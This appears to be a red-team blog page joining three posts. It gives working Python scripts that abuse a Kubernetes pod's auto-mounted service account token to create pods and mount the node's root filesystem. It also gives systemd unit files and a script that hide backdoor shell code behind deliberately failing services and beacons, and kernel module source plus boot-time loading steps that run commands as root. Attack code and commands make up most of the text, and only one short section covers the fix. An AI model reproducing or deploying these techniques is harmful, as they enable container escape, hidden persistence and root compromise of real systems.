Abuse Kubernetes with the AutomountServiceAccountToken

While I was recently practicing to take my Certified Kuberenetes Administrator (CKA) exam, I ran across an interesting default option called automountServiceAccountToken. This option, automatically mounts the service account token, within each container of a given pod. This account token is meant to provide the pod the ability to interact with the Kubernetes API server. This option being enabled by default, creates a great way for attackers with access to a single container, to abuse Kubernetes with the Automount Service Account token.

What is the Service Account Token?

Within Kubernetes, even a pod with only a single container must have a service account within its specifications. This is because the service account dictates permissions and is used to run a pods processes. By default, if a service account isn’t provided during the creation of the pod, then the “default” service account for the pods namespace is added automatically. Without a different service account being automatically created within each namespace and added to each pod spec, there wouldn’t be any real resource/process separation happening between different namespaces.

How does automountServiceAccountToken work?

When a namespace is created within Kubernetes the kube-controller-manager uses the serviceaccount-controller and the token-controller to make sure the service account called “default” exists with a valid API Bearer token. When a pod is created within the new namespace, the admission controller then checks the pod spec for a valid service account and adds the “default” service account if one doesn’t exist. If the “automountServiceAccountToken” option isn’t explicitly set to false within either the pod spec or service account spec, then the admission controller will also add a volume mount for the service account token, to each container within the pod spec. This results in the namespaced secret for the service account token being mounted directly to “/var/run/secrets/kubernetes.io/serviceaccount” within every running container by default.

Why is the AutomountServiceAccountToken bad?

Since the permissions are assigned to a service account and all pod processes are run as the service account, effectively all pods within a given namespace operate at the same level. So when the service account token mount was added to provide better access to the Kubernetes API server, there wasn’t much need to disable it by default. Additionally, some popular tooling have utilized the service account token to communicate with Kubernetes and as such it may be required in order to meet compatibility requirements.

However, this token becomes problematic if an attacker gains access to a container via some other exploit. This is further compounded by the fact that the default service account permissions are effectively read-write within the namespace and global read for most resource types. So with a simple script or even curl commands we can abuse Kubernetes with the automount service account token.

How to Abuse AutomountServiceAccountToken

I could probably write a whole post around the topic of interacting with the Kubernetes API, but lucky almost all major programing languages already have Kubernetes client libraries. In my case, I often write in python and the python client library can handle loading a containers service account token. With that token we can utilize simple function calls like within the following example to create and even delete our own pods.

from kubernetes import client, config
import time

# Load the containers local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'busybox'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c", 
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ]
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom pod manifest")
v1.create_namespaced_pod(namespace=current_namespace, body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to delete the  busybox pod we just created")
v1.delete_namespaced_pod(name="busybox", namespace=current_namespace, body=client.V1DeleteOptions())

time.sleep(10)
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

Using service account token to escalate privilege with node root volume

Since by default there are not any pod security polices to restrict the ability to mount a nodes local root filesystem. We can try to leverage the service account token within a compromised container to create a new pod with a volume which mounts the nodes root filesystem with a similar script.

from kubernetes import client, config
import time

config.load_incluster_config()
from kubernetes import client, config
import time

# Load the containers local service account token
config.load_incluster_config()

# get the current namespace from automount for ease of use :)
current_namespace = open("/var/run/secrets/kubernetes.io/serviceaccount/namespace").read()

# Establish the core API object to interact with
v1=client.CoreV1Api()

# create a basic pod manifest
pod_manifest = {
            'apiVersion': 'v1',
            'kind': 'Pod',
            'metadata': {
                'name': 'support'
            },
            'spec': {
                'containers': [{
                    'image': 'busybox',
                    'name': 'sleep',
                    "args": [
                        "/bin/sh",
                        "-c",
                        "while true;do python -c '<Shell code>';sleep 5; done"
                    ],
					'volumeMounts': [{
                        'name': 'host',
                        'mountPath': '/host'
                    }]
                }],
                'volumes': [{
                    'name': 'host',
                    'hostPath': {
                        'path': '/',
                        'type': 'Directory'
                    }
                }]
            }
        }

print("Listing all pods within the current namespace, before trying to add a pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

print("Trying to deploy a new pod with our custom comand")
v1.create_namespaced_pod(namespace=current_namespace,body=pod_manifest)

time.sleep(10)
print("Listing all pods within the current namespace, after trying to add a busybox pod")
ret = v1.list_namespaced_pod(namespace=current_namespace)
for i in ret.items:
    print("%s  %s  %s" % (i.status.pod_ip, i.metadata.namespace, i.metadata.name))

You can also use the node selector and label like “kubernetes.io/hostname” to try and get the new pod to spin up on a higher value control plane node.

With access to a pod container with the nodes root filesystem mounted, normal file and credential pillaging can take place. Also easier persistence methods can be used with write access, like adding a crontab or my recent post on leveraging controlled failure of systemd services, to gain a foot hold on the Kubernetes control plane.

How to Fix AutomountServiceAccountToken Issues?

Based on the official issue #57601, opened in late 2017. This issue is unlikely to be addressed until API v2 is available, because it’s currently required for backwards compatibility. That being said, this issue can still be addresses manually by setting “automountServiceAccountToken: false” on the “default” service account for each namespace and/or creating an Initializer to inject a custom service account upon pod creation. The only other option would be to patch a change to the admission controller, but that would risk issues with compatibility and break future upgrades.

Controlled Failure to Maintain Persistence using Systemd

Quite some time ago I wrote a blog post about how to maintain persistence with systemd services. I largely used it as a simple and reliable method to maintain access to systems during red-teaming and competitions/events. However, over the years administrators have become more accustom to systemd and how to work with its units. As a result these simplistic systemd service backdoors are caught rather quickly. So instead I’ve been modifying more recognizable/expect systemd services for controlled failure to maintain persistence.

Why Controlled Failure to Maintain Persistence?

Long story short, its much harder to detect a service with a common name that isn’t actually running when someone looks a a list of running services. It is also possible to hide activities from logging and other monitoring tools as well. Its also possible to utilize the StartLimit* options within a systemd unit, like a service, to create an effective beacon.

Method A: Force the Service to Fail in the Background

In this method we can simply have the service execute and background a given command, then exit 1/false. The result is a failed start and effectively result in the shell code running as a background zombie process. Bellow is a example of a service is very similar to the last systemd blog post.

[Service]
Type=simple
ExecStart=python -c '<shell code>' &; exit 1
Restart=always
RestartSec=300

The benefits are pretty simple, the service wont show when current running services are queried. Information about the process and the command run will be within the service logs. This could lead to quick discovery, if the logs and/or service errors are reviewed by an administrator. So overall I find this method is good for training and competitions where we want individuals to find artifacts to act upon.

In order to watch for unit failures, make it a common practice to run a command like ‘systemctl list-units –failed’ to review what’s going on with the system.

Method B: Expect failure and trigger OnFailure Unit

This method utilizes a legitimate service unit file from a common program, that’s not actually currently installed. Since the started services intended binaries and configuration files don’t actually exist, the service will fail to start. We can then use the OnFailure unit option to trigger another unit similar to this systemd-unit-status-mailer example. The idea being, we can hide our activity within another unit to leverage controlled failure to maintain persistence. An example for this method consists of the following.

Frist we can modify an existing unit or copy a new one from a common package and add OnFailure option to trigger the secondary unit.

 [Unit]
...
OnFailure=unit-status-mail@%n.service

Next we can utilize a legitimate looking secondary unit like the common unit status mailer to just execute our shell code.

[Unit]
Description=Unit Status Mailer Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/unit-status-mail.sh %I "Hostname: %H" "Machine ID: %m" "Boot ID: %b"

Finally we could add shellcode directly to the bash script run by the secondary service unit.

#!/bin/bash
MAILTO="root"
MAILFROM="unit-status-mailer"
UNIT=$1

EXTRA=""
for e in "${@:2}"; do
  EXTRA+="$e"$'\n'
done

UNITSTATUS=$(systemctl status $UNIT)

sendmail $MAILTO <<EOF
From:$MAILFROM
To:$MAILTO
Subject:Status mail for unit: $UNIT

Status report for unit: $UNIT
$EXTRA

$UNITSTATUS
EOF
python -c "<shell code>"
echo -e "Status mail sent to: $MAILTO for unit: $UNIT"

The main benefit of this method is the malicious process is nested within execution of a secondary systemd unit, which only triggers on failure. This means that the execution isn’t within the purview of systemd itself and therefore will not show up within standard logs.

Leveraging Start Limits for effective Beaconing

There are several options available to control how and when systemd will take an action on a given unit. We can use the unit options StartLimitBurst and StartLimitIntervalSec alongside the standard service option RestartSec. When used in combination with controlled service failure, we can create a timed gap between restart attempts for effective beaconing. Getting the timing right can be tricky, but a simple 5 minute beacon can be done like the following example.

[Unit]
Description=Backdoor
StartLimitBurst=12
StartLimitIntervalSec=3600

[Service]
Type=simple
ExecStart=python -c '<shell code>' &; exit 1
Restart=always
RestartSec=300

The option ‘RefuseManualStop=True’ can be used to prevent users from being able to manually stop a given service unit.

Establish Persistence with a Custom Kernel Module

First and foremost I have to admit that establishing persistence with a custom kernel module, isn’t the most ideal way. Creating kernel modules isn’t that easy. Kernel modules are normally compiled against a single kernel version, there are significant limitations on what can be done in kernel space, and errors can cause the system to freeze or crash. Regardless, I think its a valuable learning experience, that all Linux security professionals should understand. For a much easier way to maintain access to modern system check out my post on persistence with systemd timers.

As mentioned, kernel space capabilities are limited to dealing with files and devices on behalf of userspace applications. Since modules themselves are loaded into the running kernel it can be fairly difficult to write persistence code within a module that plays nice with the kernel space protections and limited functionality. Instead we can leverage a kernel function “call_usermodehelper” to execute a command in the requesting userspace. Since by default only the root user can request a module be loaded, this gives us command execution as root. In its most simplistic form the source code for a module, test_shell.c would look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros

MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{
    call_usermodehelper("/tmp/exe", NULL, NULL, UMH_WAIT_EXEC);
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Since kernel mode capabilities and libraries are so limited, we can further simplify the payload execution by staging it into a standard c application instead. This allows for the module to attempt to execute the staged application in a root terminal and still return normally regardless of what happens. The source code for a simple c execution program, nammed exe.c, might look like the following.

#include <stdlib.h>
int main(void)
{
    system("wall \"Hello There Im a Module!\"");
    return 0;
}

If we don’t want to stage a second executable to establish persistence with the custom kernel module, its possible to create variables for the users environment and command line arguments to be passed directly to the ‘call_usermodeheler’ function. The module source code to do this might look like the following.

#include <linux/module.h>    // included for all kernel modules
#include <linux/init.h>      // included for __init and __exit macros


MODULE_LICENSE("GPL");
MODULE_AUTHOR("sleventyeleven");
MODULE_DESCRIPTION("A Simple shell module");

static int __init shell_init(void)
{

    static char *envp[] = {
    "HOME=/",
    "TERM=linux",
    "USER=root",
    "SHELL=/bin/bash",
    "PATH=/sbin:/usr/sbin:/bin:/usr/bin",
    NULL};

    char *argv[] = {
    "wall",
    "\"Hello I'm a Module!\"",
    NULL};

    call_usermodehelper("/bin/bash", argv, envp, UMH_WAIT_EXEC);
    printk(KERN_INFO "Installing Module!\n");
    return 0;    // Non-zero return means that the module couldn't be loaded.
}

static void __exit shell_cleanup(void)
{
    printk(KERN_INFO "Uninstalling Module!\n");
}

module_init(shell_init);
module_exit(shell_cleanup);

Before compiling the module, you will need to be on the target system or a similar system with the same kernel version. You will also need to have all of the required tools for kernel development and the current kernels header files. The easiest way to do that is to run ‘apt-get install build-essential linux-headers-$(uname -r)’ on Debian based systems or ‘yum install kernel-headers kernel-devel glibc-devel gcc gcc-c++ make’ for Redhat based systems.

Once the build tools are installed, we can create a Makefile with a kbuild (kernel builder) extension at the top to compile our module. Just keep in might that kbuild will switch to the kernel source directory and only allow use of includes of headers within the original source.

obj-m += test_shell.o

all:
         make -C /lib/modules/$(shell uname -r)/build M=${PWD} modules

clean:
        make -C /lib/modules/$(shell uname -r)/build M=${PWD} clean

You can use a command like ‘insmod test_shell.ko’ to load a module directly into the kernel and ‘rmmod test_shell.ko’ to remove the module. This allows for easy testing of modules, before configuring them to automatically loaded at boot.

Once the module is complied and tests successfully, we can copy the module to the current kernels’ modules directory.

cp test_shell.ko /lib/modules/`uname -r`/kernel/lib/

Next we need to run ‘depmod’ to build out the binary tree files of all the modules and dependencies. Without the dependency tree updated, the system wont know our module exists or how to load it into the kernel.

depmod -a 

If we are going to stage the second executable for the module to attempt to execute, then we will need to compile it with gcc like the following.

gcc exe.c -o /tmp/exe

To have persistence with the custom kernel module loaded at boot time, we need to modify the config files for either modprobe or kmod depending on which is used. In most cases you can easily figure out if its a kmod system by looking if the standard module tools are just symbolic links to kmod. This can be done with a command like the following.

ls -al `which modprobe`

If the you do see modprobe is just a symbolic link to kmod, getting a registered module to start at boot is fairly simple. Just place the name of the module, minus the .ko extension, in the /etc/module config file. This can be done with a simple command like the following. It will cause systemd-modules-load service to utlize kmod, to automatically load the module on boot.

echo 'test-shell' >> /etc/modules

Interesting you can actually set the SUID bit on kmod so standard users can load modules as root. Whereas if you set SUID on legacy modprobe executable, it still runs in the userspace instead. So simply setting SUID on the kmod executable can be an easy way to establish privilege escalation similar to the dash shell, I’ve blogged about before.

If its not a kmod system, we can instead utilize modprobe to automatically start the custom module by creating a .conf file in the /etc/modeprobe.d/ directory. The content of the .conf should look similar too:

install test_shell

On modprobe systems, standard users can also request a module be loaded, if there is a valid configuration file that already exists. But any code execution is done within the requesting users context. Interestingly enough you can have modprobe run a terminal command after loading a module by appending a command to the end of install statement in the config file. That could work as a persistence method as well, but there is no guarantee all filesystems are mounted and networking has been established when the module is loaded.

With all that work complete, we have established persistence, until the kernel is updated at least.